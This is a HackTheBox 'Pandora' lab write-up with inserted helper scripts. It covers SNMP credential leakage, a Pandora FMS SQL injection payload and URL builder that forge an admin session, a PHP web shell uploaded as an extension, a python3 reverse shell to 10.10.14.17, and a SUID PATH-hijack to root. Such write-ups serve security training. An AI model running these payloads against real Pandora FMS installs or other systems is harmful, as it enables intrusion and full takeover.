CTF-Writeups/HackTheBox/Pandora.md
2022-05-21 22:01:49 +05:00

HackTheBox-Pandora

NMAP

PORT   STATE SERVICE VERSION                                           
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))                 
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods:                                                        
|_  Supported Methods: GET HEAD POST OPTIONS 
|_http-server-header: Apache/2.4.41 (Ubuntu) 
|_http-title: Play | Landing    
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visiting the web page, it looks like a stock template

and doesn't display anything interesting, so I ran gobuster to fuzz for files and directories.

It doesn't find anything either, so I tried subdomain enumeration with wfuzz, which also failed.

Since the web application had nothing of interest, I started scanning UDP ports and found an SNMP service running.

Foothold

To enumerate the SNMP service there's a tool called snmpwalk, which lets us list the running processes (including their command lines), the interfaces and operating system details.

Keeping this running, after about 30 minutes I saw a process whose command line contained credentials (the ones for the user daniel used below).
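As an added example (not code from the original writeup), a small shell helper that filters snmpwalk process-parameter output for command lines carrying a secret, which is the check that finds the credentials above. The sample output, the /opt/check_host command and the "public" community string are constructed assumptions; the OID is the standard hrSWRunParameters column.

```shell
#!/bin/sh
# Added example, not from the writeup: filter snmpwalk process-parameter output
# for command lines that carry a secret.
# Live use (community string "public" is an assumption):
#   snmpwalk -v2c -c public panda.htb 1.3.6.1.2.1.25.4.2.1.5   # hrSWRunParameters
# The job in the writeup only showed up after a while, so poll instead of walking once:
#   while :; do snmpwalk -v2c -c public panda.htb 1.3.6.1.2.1.25.4.2.1.5 | creds_from_walk; sleep 10; done

# Constructed sample output (not captured from the box); the /opt/check_host
# command is made up to imitate a cron job passing a password on its command line.
sample_walk() {
  cat <<'EOF'
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "maybe-ubiquity"
HOST-RESOURCES-MIB::hrSWRunParameters.745 = STRING: "-f"
HOST-RESOURCES-MIB::hrSWRunParameters.1099 = STRING: "-c sleep 30; /bin/bash -c '/opt/check_host -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.1100 = STRING: "-u www-data -k start"
EOF
}

# Keep only hrSWRunParameters lines that mention a -p/--password flag or a
# password-like keyword; everything else in a walk is noise for this purpose.
creds_from_walk() {
  grep 'hrSWRunParameters' \
    | grep -iE -- '(^|[^[:alnum:]])(-p|--password|pass(word)?|pwd|secret|token)([^[:alnum:]]|$)'
}

# Turn "-u USER -p PASS" style arguments into "USER:PASS", one per line.
extract_u_p() {
  sed -nE "s/.*-u[= ]+([^ \"']+).*-p[= ]+([^ \"']+).*/\\1:\\2/p"
}

# Stand-alone run on the constructed sample:
sample_walk | creds_from_walk | extract_u_p    # prints daniel:HotelBabylon23
```

The keyword list is deliberately loose; on a real walk expect a few false positives (e.g. "-p" used as a port flag), which are cheap to read through compared to missing the one line that matters.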

Checking the Apache vhosts file we can see a subdomain pandora.panda.htb; it runs as user matt but listens only on localhost, so we need port forwarding to reach it from our browser:

ssh -L 2222:127.0.0.1:80 daniel@panda.htb

Also add the domain name to the /etc/hosts file.

Navigating to that port in the browser presents a login page for Pandora FMS.

Going back to Pandora's directory on the box we can read some files, among which pandoradb_data.sql contains the seed queries; one of them inserts the admin user together with his password hash.

Trying to log in to Pandora as daniel gives an error that this user is only allowed to use the API.

Looking at the API documentation, we can use its get operations to pull data from Pandora:

https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi

http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=list_all_user&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23

We can see that daniel is only allowed to read data via get operations. We can also fetch the users' password hashes, but those were not crackable:

http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=users&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23

Looking for exploits I found a remote code execution, but it requires an authenticated admin user.

The second exploit was a SQL injection in /include/chart_generator.php?session_id='

We can verify the SQLi by breaking the query with a single quote (').

To find how many columns the query selects we can use ORDER BY.

If it doesn't give any MySQL error we are good, so we increase the number.

ORDER BY 4 produces a SQL error because the fourth column doesn't exist, so the query fetching the data selects 3 columns.
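Counting columns by hand works, but an added example (not the writeup's own code) shows how to automate the ORDER BY probe against the session_id parameter. The forwarded URL is the one used later in the writeup; treating any response containing "sql" as the error case is an assumption to adjust to what the target really returns, and demo_probe is an offline stand-in for a query with three columns.

```shell
#!/bin/sh
# Added example, not from the writeup: find the column count of the injected
# query by raising ORDER BY n until the server returns a SQL error.

# Forwarded URL from the writeup; override with BASE_URL=... if needed.
BASE_URL="${BASE_URL:-http://127.0.0.1:2222/pandora_console/include/chart_generator.php}"

# Live probe: 0 if the injected query ran cleanly, 1 if the page shows an error.
# Assumption: an error response contains the string "sql" (e.g. a MySQL syntax
# message); adjust the grep to whatever the target actually returns.
http_probe() {
  local body
  body=$(curl -s -G "$BASE_URL" --data-urlencode "session_id=' ORDER BY $1-- -") || return 1
  ! printf '%s' "$body" | grep -qi 'sql'
}

# Offline stand-in for the live probe: behaves like a query with three columns,
# which is what the session lookup turned out to have.
demo_probe() {
  [ "$1" -le 3 ]
}

# find_column_count PROBE [MAX]: prints the number of columns, or returns 1 when
# even ORDER BY 1 fails (then the injection point is not what we think) or no
# error shows up before MAX.
find_column_count() {
  local probe max n
  probe="$1"; max="${2:-30}"; n=1
  while [ "$n" -le "$max" ]; do
    if ! "$probe" "$n"; then
      [ "$n" -eq 1 ] && return 1
      echo $((n - 1))
      return 0
    fi
    n=$((n + 1))
  done
  return 1
}

find_column_count demo_probe    # prints 3
```

Against the live target call find_column_count http_probe; the "ORDER BY 1 fails" branch is the sanity check worth keeping, because a WAF or a different quoting context produces errors for every n and would otherwise be misread as zero columns.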

Rabbit Hole

So let's use sqlmap to dump data. We can either supply the URL directly or save the request through Burp; I find saving the request convenient, so I'll go with that (sqlmap reads it with -r).

It starts dumping the database.

Here we fell into a rabbit hole: dumping the database reveals session IDs for Pandora FMS users, but only for matt and daniel; daniel only has API access and matt is just a normal user.

Replacing our PHPSESSID cookie with matt's session ID logs us in as matt.

But we can't really do much as matt.

Privilege Escalation (Matt)

Going back to the URL vulnerable to SQLi, we can elevate our privileges to admin by following this article:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

To see what values the table expects, we can look in pandoradb.sql: tsession_php has three columns (matching the ORDER BY result above), holding the session ID, the last-active timestamp and the serialized session data.

Our SQLi payload looks like this:

union+select+'randomshit_token','1638796349','id_usuario|s:5:"admin";'+--+

The UNION SELECT makes the session lookup return a row for a token we choose (it can be any string) whose serialized data says id_usuario is admin, so Pandora treats that token as an admin session. Note that s:5 is the string length of "admin"; it must match the username exactly.

Running this shows no errors, which means it executed correctly; now replace the PHPSESSID cookie with our token.
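As an added example (not the writeup's own code), a helper that builds the injected URL for the payload above. It assumes the three columns of tsession_php are, in order, the session ID, the last-active timestamp and the serialized session data, and that the data column is read as PHP session data. It recomputes the s:N length, which must equal the byte length of the username, and percent-encodes the payload so the quotes, pipe and semicolon survive the query string.

```shell
#!/bin/sh
# Added example, not from the writeup: build the chart_generator.php URL that
# carries the UNION SELECT forging an admin session.
# Assumed column order of tsession_php: id_session, last_active, data.

# PHP session serialisation of one string variable: name|s:LENGTH:"value";
# LENGTH is the byte length, so it is computed rather than hard-coded.
php_session_data() {
  len=$(printf '%s' "$1" | wc -c | tr -d ' ')
  printf 'id_usuario|s:%d:"%s";' "$len" "$1"
}

# Percent-encode everything outside the RFC 3986 unreserved set. Done in awk so
# it runs under plain sh; ASCII input only.
urlencode() {
  s="$1" LC_ALL=C awk 'BEGIN {
    for (i = 1; i < 256; i++) ord[sprintf("%c", i)] = i
    s = ENVIRON["s"]; out = ""
    for (i = 1; i <= length(s); i++) {
      c = substr(s, i, 1)
      if (c ~ /^[A-Za-z0-9._~-]$/) out = out c
      else out = out sprintf("%%%02X", ord[c])
    }
    printf "%s", out
  }'
}

# build_session_sqli_url BASE TOKEN USER [LAST_ACTIVE]
# TOKEN becomes the PHPSESSID we set in the browser afterwards; LAST_ACTIVE
# defaults to now so the forged session does not look stale.
build_session_sqli_url() {
  base="$1"; token="$2"; user="$3"; ts="${4:-$(date +%s)}"
  payload="' UNION SELECT '$token','$ts','$(php_session_data "$user")'-- -"
  printf '%s?session_id=%s' "$base" "$(urlencode "$payload")"
}

# Stand-alone use with the writeup's forwarded URL and token:
#   curl -s "$(build_session_sqli_url http://127.0.0.1:2222/pandora_console/include/chart_generator.php randomshit_token admin)" >/dev/null
# then set PHPSESSID=randomshit_token in the browser.
```

Using the current time for last_active rather than the fixed 1638796349 from the payload above is a precaution: if the application expires idle sessions, a timestamp months in the past would be rejected.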

We are now logged in as admin. All that's left is the RCE; I tried the exploit from Exploit-DB but it didn't work.

Then I saw a PHP file upload exploit in a YouTube video.

So we make a PHP file that executes commands and put it in a zip archive, because it has to be uploaded as an extension:

<?php system($_GET['cmd']); ?>

Then upload the archive containing the PHP file as an extension.

After uploading, execute the file through http://127.0.0.1:2222/pandora_console/extensions/shell.php with the command in the cmd parameter.

We can get a reverse shell through python3 (URL-encoded, as passed in the cmd parameter; 10.10.14.17:3333 is our listener):

python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22/bin/sh%22)%27

Stabilizing the shell with python3 (pty.spawn).

Privilege Escalation (root)

Let's check whether we can run anything as root with sudo -l, but it gives an error.

This can be fixed by generating an SSH key pair for matt and logging in over SSH instead of using the reverse shell.

But it turns out we can't run anything as root, so moving on to finding SUID binaries.

The pandora_backup binary seems suspicious as it isn't available by default. Transferring it and inspecting it, we can see that it uses tar to create an archive of /var/www/pandora/pandora_console/* in /root/.backup, named pandora-backup.tar.gz.

Because tar is called by name rather than by absolute path, this is vulnerable to a PATH hijack: we create a file named tar that copies bash and makes the copy SUID, and make it executable.

Then exporting the PATH variable

export PATH=/tmp:$PATH

As we run the binary it executes our tar as root and makes bash SUID; running that bash with -p keeps the root euid and gives us a root shell.
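As an added example (not the writeup's own code), the hijack packaged as shell functions, together with the check that the binary really calls tar by bare name and that the PATH lookup actually resolves to our file. The strings check and the assumption that pandora_backup does not reset PATH before calling tar are mine.

```shell
#!/bin/sh
# Added example, not from the writeup: the PATH hijack as reusable steps.
# First confirm the SUID binary calls tar by bare name; a hard-coded /usr/bin/tar
# would not be hijackable (assumption: the call is visible as a string):
#   strings pandora_backup | grep -n 'tar '

# write_fake_tar DIR: drop a "tar" into DIR that copies bash and sets the SUID
# bit on the copy. The body only matters when the SUID binary runs it as root.
write_fake_tar() {
  cat > "$1/tar" <<'EOF'
#!/bin/sh
cp /bin/bash /tmp/bash
chmod u+s /tmp/bash
EOF
  chmod +x "$1/tar"
}

# resolved_tar DIR: which "tar" a PATH lookup finds once DIR is in front.
# Runs in a subshell so the caller's PATH and command hash stay untouched.
resolved_tar() {
  ( PATH="$1:$PATH"; hash -r; command -v tar )
}

# Stand-alone run, mirroring the writeup (/tmp is the hijack dir there):
#   write_fake_tar /tmp
#   export PATH=/tmp:$PATH
#   resolved_tar /tmp          # must print /tmp/tar, otherwise the hijack cannot work
#   ./pandora_backup           # runs /tmp/tar as root
#   /tmp/bash -p               # -p keeps euid 0; without it bash drops privileges
```

The resolved_tar check is the one step people skip: if the binary sanitises PATH, or a hashed /usr/bin/tar is still cached in the calling shell, the real tar runs and nothing happens, which looks identical to a broken payload.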

References